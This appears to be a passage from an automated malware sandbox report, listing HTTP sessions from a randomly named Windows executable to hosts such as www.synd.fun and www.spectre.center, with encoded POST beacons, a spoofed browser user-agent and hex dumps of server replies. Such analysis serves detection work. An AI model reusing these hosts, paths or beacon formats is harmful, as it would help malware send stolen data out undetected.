                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 4d 44 6f 44 65 63 69 6d 4f 6c 37 71 59 54 4b 43 2f 39 49 77 63 69 41 66 41 76 64 57 39 63 4c 39 46 75 6e 57 32 72 55 41 45 67 44 4e 62 34 6e 56 31 4e 41 57 4f 4d 59 61 6c 41 6e 6b 63 2f 64 77 74 62 6c 53 47 65 6b 33 35 31 58 63 33 5a 77 71 4e 4f 35 6e 58 54 70 52 39 50 59 71 6c 34 6a 55 68 31 6a 58 4f 64 69 48 50 77 70 2b 65 51 49 79 44 7a 31 39 48 37 53 36 36 6a 45 4a 2b 35 4d 6f 54 47 63 54 34 6b 64 72 63 42 62 52 59 55 74 79 2f 51 58 43 38 43 55 71 4b 41 6d 70 54 70 74 4b 2f 74 64 69 6a 6b 79 32 4c 37 64 6e 6a 2f 50 47 36 2f 6d 68 65 78 30 79 37 56 4c 33 52 78 4f 4d 62 74 69 4c 51 76 56 64 55 62 53 7a 66 71 34 77 74 74 51 34 6e 58 71 35 56 4c 56 73 6c 34 73 41 63 68 56 43 63 41 6a 55 54 4f 68 4b 4c 2f 63 52 38 6e 4e 65 50 36 74 61 50 6c 62 45 6c 54 74 30 66 75 41 71 33 6c 37 38 4f 49 56 47 57 37 6f 48 70 33 7a 39 57 73 78 6b 52 46 56 49 50 46 63 4d 39 54 74 6e 48 52 4c 41 6e 70 57 6b 63 63 67 6d 6e 31 2b 65 70 32 48 37 55 41 70 79 2b 4c 41 42 37 48 35 38 46 34 45 64 52 62 [TRUNCATED]
                                                                                                        Data Ascii: aNXP_jw=MDoDecimOl7qYTKC/9IwciAfAvdW9cL9FunW2rUAEgDNb4nV1NAWOMYalAnkc/dwtblSGek351Xc3ZwqNO5nXTpR9PYql4jUh1jXOdiHPwp+eQIyDz19H7S66jEJ+5MoTGcT4kdrcBbRYUty/QXC8CUqKAmpTptK/tdijky2L7dnj/PG6/mhex0y7VL3RxOMbtiLQvVdUbSzfq4wttQ4nXq5VLVsl4sAchVCcAjUTOhKL/cR8nNeP6taPlbElTt0fuAq3l78OIVGW7oHp3z9WsxkRFVIPFcM9TtnHRLAnpWkccgmn1+ep2H7UApy+LAB7H58F4EdRbiNwVrjEFE+s3fErFoDURsayQQtysdmgyN/NEFSEh6osu96FuLQ+uycVO+kSoaMxGxKb7lRRmiDtGtlI4WMCaqOtyaAU49cgHEmQi5Q5Wg8HSO9VsbTIdMWsWs24D/qMNTOAqhK9X9yaExmrtbQiJYRFVfQYDQSlJCg7uLDzMCN2yTkn9qIwmxAL62a7liekfwM1Br1aKSAmUFwOMeiQADtVfn+R60Dw6sx+LCh7/olfwc8wnTKP94/rGLizcfwSt/LVsOrl0Yj23sGGYK0bEC73gaEnNxZARhWC6QIbqxVZw/Om5ByL53R+xEBUoW1ErgNPCGh5pk/KYfqNwECWvLoLqDauKigJ6R1hXKxprSfae9EKHj+yAh1161wD1zLu7VYjjrTT1waqGvGEwOyFCIVXnV2CooGxEZFhQYanhrNveVIeVjYaVXue61L98gMEmQWXzJ7nSdFVUg3Yn1jrMMhIToJgcdEAeuC0SPq/S5ovzJ7DfvVb5PNoGYSltqADF1l1uzPopznxqBOV4ZXzKlSudzbxZg1HQNo9FzhpNF7zFB5Rewjk/DRjrz6odDmT2cCfweTC4yMnLxIO1PalSJ63YkIZGSlhl5+z95y4C4aqdM2VMLTQ1vzxOAFtB1+dfsjF6tmyzIp4ZPUPWJiqj6W0ivdf7AiqAex [TRUNCATED]
                                                                                                        Dec 2, 2024 14:38:09.194322109 CET354INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:08 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.6498955.39.10.93802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:10.534256935 CET551OUTGET /v70f/?aNXP_jw=BBAjdqWYBB/MRyq00dIcezl7OvIx5dSebduL9p4zICzjFNfvyshgEJ0+kFvLW81K0aQqDuxS3lz73s8YF+5idFlByfp0+7vcrnzlNMGRBRFmOTNFNBZSGoPe8m8L5uZEU1B7gQA=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.spectre.center
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:38:11.840359926 CET1236INHTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:11 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Data Raw: 31 66 66 65 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 65 63 65 63 65 63 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 76 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 65 63 65 63 65 63 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9f d0 b0 d1 80 d0 ba d0 be d0 b2 d0 b0 20 d1 81 d1 82 d0 be d1 80 d1 96 d0 bd d0 ba d0 b0 20 49 6d 65 6e 61 2e 55 41 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e [TRUNCATED]
                                                                                                        Data Ascii: 1ffe2<!DOCTYPE html><html lang="ru-RU" prefix="og: http://ogp.me/ns#" class="no-js"><head> <meta name="theme-color" content="#ececec" /> <meta name="msapplication-navbutton-color" content="#ececec" /> <meta charset="UTF-8" /> <title> Imena.UA</title> <link rel="icon" type="image/png" href="//img.imena.ua/i/32.png" sizes="32x32"> <link rel="icon" type="image/png" href="//img.imena.ua/i/96.png" sizes="96x96"> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700,300&subset=latin,cyrillic" rel="stylesheet" type="text/css" /> <meta name="viewport" content="user-scalable=0, width=device-width, initial-scale=1" /> <link rel="stylesheet" href="https://img.imena.ua/css/media-set.css" type="text/css" /> <style> .park_domain_info { margin: 0 auto; max-width: 650px; text-align: center; } .park_domain_info p { font-size: 16px; padding-b [TRUNCATED]
                                                                                                        Dec 2, 2024 14:38:11.840380907 CET1236INData Raw: 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 33 37 37 61 61 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65
                                                                                                        Data Ascii: e { font-size: 30px; color: #0377aa; } </style></head><body> <div class="layout"> <div class="header_nav"> <header> <div class="reducer"> <div c
                                                                                                        Dec 2, 2024 14:38:11.840395927 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 64 75 63 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 5f 69 63 6f 6e 22 3e 3c 2f 64 69 76 3e 0a 20
                                                                                                        Data Ascii: <div class="reducer"> <div class="nav_icon"></div> <ul> <li class="first_nav_li mob_nav_3"> <div class="lang">
                                                                                                        Dec 2, 2024 14:38:11.840424061 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20
                                                                                                        Data Ascii: </div> <div> <div class="radio left "> <div class="icon"></div>
                                                                                                        Dec 2, 2024 14:38:11.840436935 CET1236INData Raw: 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: </a> </div> </li> <li class="nav_phone" itemscope itemtype="http://schema.org/Organization"> <a href="tel:+380442010102">+380 (44) 201-01-0
                                                                                                        Dec 2, 2024 14:38:11.840444088 CET1236INData Raw: 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: </li> <li> <a href="https://www.imena.ua/domains/premium-domains" title=" "> </a>
                                                                                                        Dec 2, 2024 14:38:11.840455055 CET776INData Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6d 65 6e 61 2e 75 61 2f 68 65 6c 70 22 3e d0 94 d0 be d0 bf d0 be d0 bc d0 be d0 b3 d0 b0 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20
                                                                                                        Data Ascii: https://www.imena.ua/help"></a> </li> <li> <a href="https://www.imena.ua/contact"></a> </li>
                                                                                                        Dec 2, 2024 14:38:11.840471983 CET1236INData Raw: 23 22 20 63 6c 61 73 73 3d 22 65 6e 74 65 72 5f 62 74 6e 22 3e d0 92 d1 85 d1 96 d0 b4 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6e 74 65 72 5f 62 6c 6f 63 6b 20 68 69 64 64
                                                                                                        Data Ascii: #" class="enter_btn"></a> <div class="enter_block hidden"> <ol class="enter_block_black"> <li><a href="https://control.imena.ua/login.php?lang=2" rel="nofollow"><s
                                                                                                        Dec 2, 2024 14:38:11.840642929 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 6e 67 5f 6c 69 73 74 20 68 69 64 64 65 6e 22 3e 0a 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: </div> <div class="lang_list hidden"> <div class="lang_list_container"> <div> <div class="radio left ">
                                                                                                        Dec 2, 2024 14:38:11.840657949 CET1236INData Raw: 75 74 20 74 79 70 65 3d 22 72 61 64 69 6f 22 20 6e 61 6d 65 3d 22 68 5f 74 65 72 6d 22 20 76 61 6c 75 65 3d 22 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                        Data Ascii: ut type="radio" name="h_term" value="1"> <a href="https://www.imena.ua/ru" class="lang_ru"></a> </label> </div>
                                                                                                        Dec 2, 2024 14:38:11.960932016 CET1236INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 5f 73 65 61 72 63
                                                                                                        Data Ascii: v> </div> <div class="domain_search_bg_c"></div> <div class="domain_search_bg_triangle_l"></div> <div class="domain_search_bg_triangle_r"></div>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.649912194.58.112.174802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:18.647104025 CET795OUTPOST /6sgf/ HTTP/1.1
                                                                                                        Host: www.synd.fun
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.synd.fun
                                                                                                        Referer: http://www.synd.fun/6sgf/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 33 67 75 70 4a 4a 6c 78 71 33 6e 69 65 75 77 4d 68 7a 47 37 58 45 64 39 70 51 35 36 32 59 55 4f 70 62 67 37 67 32 50 47 76 54 71 57 47 2b 59 48 68 45 4c 37 76 56 76 56 2b 4b 36 79 77 34 54 73 53 44 38 62 73 53 48 69 5a 49 34 66 53 77 76 54 76 30 54 77 62 74 48 2f 6d 63 47 68 62 39 71 33 79 65 59 57 6e 5a 53 55 59 62 49 72 48 35 38 6b 4c 32 53 44 6c 70 43 6c 41 42 6e 45 61 50 79 7a 38 4e 58 6d 34 6a 6f 36 38 49 49 4e 56 5a 4f 68 6c 43 30 4f 30 48 6e 59 5a 69 76 6e 4b 2b 4d 2b 32 30 65 67 6b 48 63 61 71 39 4e 69 44 47 45 46 4c 2f 57 35 63 44 47 39 52 45 33 2b 6e 75 45 56 34 6b 4e 70 44 73 39 67 45 70 56 78
                                                                                                        Data Ascii: aNXP_jw=3gupJJlxq3nieuwMhzG7XEd9pQ562YUOpbg7g2PGvTqWG+YHhEL7vVvV+K6yw4TsSD8bsSHiZI4fSwvTv0TwbtH/mcGhb9q3yeYWnZSUYbIrH58kL2SDlpClABnEaPyz8NXm4jo68IINVZOhlC0O0HnYZivnK+M+20egkHcaq9NiDGEFL/W5cDG9RE3+nuEV4kNpDs9gEpVx
                                                                                                        Dec 2, 2024 14:38:20.003469944 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:19 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 [TRUNCATED]
                                                                                                        Data Ascii: d93Z[o~H()"&qK9-E!r]Jm4bh@7}* _((a3!E(9s.9gf;J2%/n&*_F)0FN>PnOFJ.:>n@5JC[n$*HuO(1zUyxbWkcoEF)N{J@u<(I/^&)Kv='l[_-4]\x`7L7.v3]/vIeG4xv/*k{k3[[3NdD(-&S);x*NqZxEajbsmLBFQ}fT0HO2;GGi;sn[CJY)NZn@TdVA$gZ4;V&R`(}E]?Gx>Qz7+A;_Ymn$Ngm3vp`%xZT{Q_iu{f}4sV+pk7!foo/X-0NVsUgdmeVPj>\>E]GvLH8#GIq.gPUK&uUg%d,rBtO3oq^Sn`0U|iBR74,O$G1f6}t@`YpANd49^&^7hLiLCOz &GO'7Ez?C,aB)YP`+X2c`GW"#<]=[)[lSoph"sk0 [TRUNCATED]
                                                                                                        Dec 2, 2024 14:38:20.003499031 CET1236INData Raw: b6 ea 54 fd 06 90 fa d6 00 fe eb 05 2d 5f 6d 27 96 f6 65 2c 98 44 61 d0 7d b2 52 80 ba 30 77 97 82 d6 3f 61 bd 88 50 10 ef e3 f4 1e ec 8c 29 cc e0 ea bc d3 6a e1 c4 a3 b6 56 79 c1 49 3b 04 c2 0d 10 13 03 05 ba df 22 d2 dd 9f fc 01 2e f2 78 f2 45
                                                                                                        Data Ascii: T-_m'e,Da}R0w?aP)jVyI;".xE(03{5*RXLFtw9~IKp|Bnd;-He2TzYx<|"EO+9:70Z`y[(I6<6Ab#D&k@j
                                                                                                        Dec 2, 2024 14:38:20.003508091 CET1189INData Raw: 7d e9 84 6c 69 dd 4b 9d 79 cd 2b e7 d2 6e ae f0 01 aa b1 1d b5 5d 9c 22 3b 38 6f cf cf 9a 8b 3a 58 1f 3a 1f 3b 3b fe 96 44 4c c2 82 98 20 37 3a f2 7c 44 1a 66 35 a1 66 a7 e8 bc b4 36 3d 89 29 3e ab d3 ec 00 95 7b 01 8e 39 bb e3 16 9d b7 91 09 03
                                                                                                        Data Ascii: }liKy+n]";8o:X:;;DL 7:|Df5f6=)>{9G'r@)"Ct(UWv!>ml2OOyupqEk)^;%-*m]3bvNZ{f~Niu`E)G\h|0z+,:qFhx


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        10192.168.2.649919194.58.112.174802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:21.340894938 CET819OUTPOST /6sgf/ HTTP/1.1
                                                                                                        Host: www.synd.fun
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.synd.fun
                                                                                                        Referer: http://www.synd.fun/6sgf/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 33 67 75 70 4a 4a 6c 78 71 33 6e 69 65 4f 67 4d 6d 51 75 37 53 6b 64 38 69 77 35 36 76 49 55 4b 70 62 63 37 67 7a 75 64 75 6c 36 57 47 65 6f 48 69 47 76 37 73 56 76 56 71 36 36 33 39 59 54 6e 53 45 30 70 73 58 76 69 5a 4d 6f 66 53 30 2f 54 75 44 50 7a 61 39 48 68 71 38 47 6a 56 64 71 33 79 65 59 57 6e 5a 47 71 59 62 51 72 45 4b 6b 6b 4e 58 53 41 6d 70 43 36 48 42 6e 45 58 76 79 2f 38 4e 58 2b 34 69 6b 45 38 4f 4d 4e 56 62 6d 68 6c 52 73 50 36 48 6d 79 58 43 75 4d 4a 4e 70 6d 31 69 58 33 71 58 77 6a 2f 2f 35 30 50 51 5a 66 58 4d 57 61 4f 54 6d 2f 52 47 76 4d 6e 4f 45 2f 36 6b 31 70 52 37 78 48 4c 64 77 53 32 36 76 59 34 43 45 66 31 70 4b 43 39 37 32 34 37 2b 2f 46 77 77 3d 3d
                                                                                                        Data Ascii: aNXP_jw=3gupJJlxq3nieOgMmQu7Skd8iw56vIUKpbc7gzudul6WGeoHiGv7sVvVq6639YTnSE0psXviZMofS0/TuDPza9Hhq8GjVdq3yeYWnZGqYbQrEKkkNXSAmpC6HBnEXvy/8NX+4ikE8OMNVbmhlRsP6HmyXCuMJNpm1iX3qXwj//50PQZfXMWaOTm/RGvMnOE/6k1pR7xHLdwS26vY4CEf1pKC97247+/Fww==
                                                                                                        Dec 2, 2024 14:38:22.741286993 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:22 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 [TRUNCATED]
                                                                                                        Data Ascii: d93Z[o~H()"&qK9-E!r]Jm4bh@7}* _((a3!E(9s.9gf;J2%/n&*_F)0FN>PnOFJ.:>n@5JC[n$*HuO(1zUyxbWkcoEF)N{J@u<(I/^&)Kv='l[_-4]\x`7L7.v3]/vIeG4xv/*k{k3[[3NdD(-&S);x*NqZxEajbsmLBFQ}fT0HO2;GGi;sn[CJY)NZn@TdVA$gZ4;V&R`(}E]?Gx>Qz7+A;_Ymn$Ngm3vp`%xZT{Q_iu{f}4sV+pk7!foo/X-0NVsUgdmeVPj>\>E]GvLH8#GIq.gPUK&uUg%d,rBtO3oq^Sn`0U|iBR74,O$G1f6}t@`YpANd49^&^7hLiLCOz &GO'7Ez?C,aB)YP`+X2c`GW"#<]=[)[lSoph"sk0 [TRUNCATED]
                                                                                                        Dec 2, 2024 14:38:22.741344929 CET1236INData Raw: b6 ea 54 fd 06 90 fa d6 00 fe eb 05 2d 5f 6d 27 96 f6 65 2c 98 44 61 d0 7d b2 52 80 ba 30 77 97 82 d6 3f 61 bd 88 50 10 ef e3 f4 1e ec 8c 29 cc e0 ea bc d3 6a e1 c4 a3 b6 56 79 c1 49 3b 04 c2 0d 10 13 03 05 ba df 22 d2 dd 9f fc 01 2e f2 78 f2 45
                                                                                                        Data Ascii: T-_m'e,Da}R0w?aP)jVyI;".xE(03{5*RXLFtw9~IKp|Bnd;-He2TzYx<|"EO+9:70Z`y[(I6<6Ab#D&k@j
                                                                                                        Dec 2, 2024 14:38:22.741354942 CET1189INData Raw: 7d e9 84 6c 69 dd 4b 9d 79 cd 2b e7 d2 6e ae f0 01 aa b1 1d b5 5d 9c 22 3b 38 6f cf cf 9a 8b 3a 58 1f 3a 1f 3b 3b fe 96 44 4c c2 82 98 20 37 3a f2 7c 44 1a 66 35 a1 66 a7 e8 bc b4 36 3d 89 29 3e ab d3 ec 00 95 7b 01 8e 39 bb e3 16 9d b7 91 09 03
                                                                                                        Data Ascii: }liKy+n]";8o:X:;;DL 7:|Df5f6=)>{9G'r@)"Ct(UWv!>ml2OOyupqEk)^;%-*m]3bvNZ{f~Niu`E)G\h|0z+,:qFhx


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        11192.168.2.649925194.58.112.174802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:24.011362076 CET1832OUTPOST /6sgf/ HTTP/1.1
                                                                                                        Host: www.synd.fun
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.synd.fun
                                                                                                        Referer: http://www.synd.fun/6sgf/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
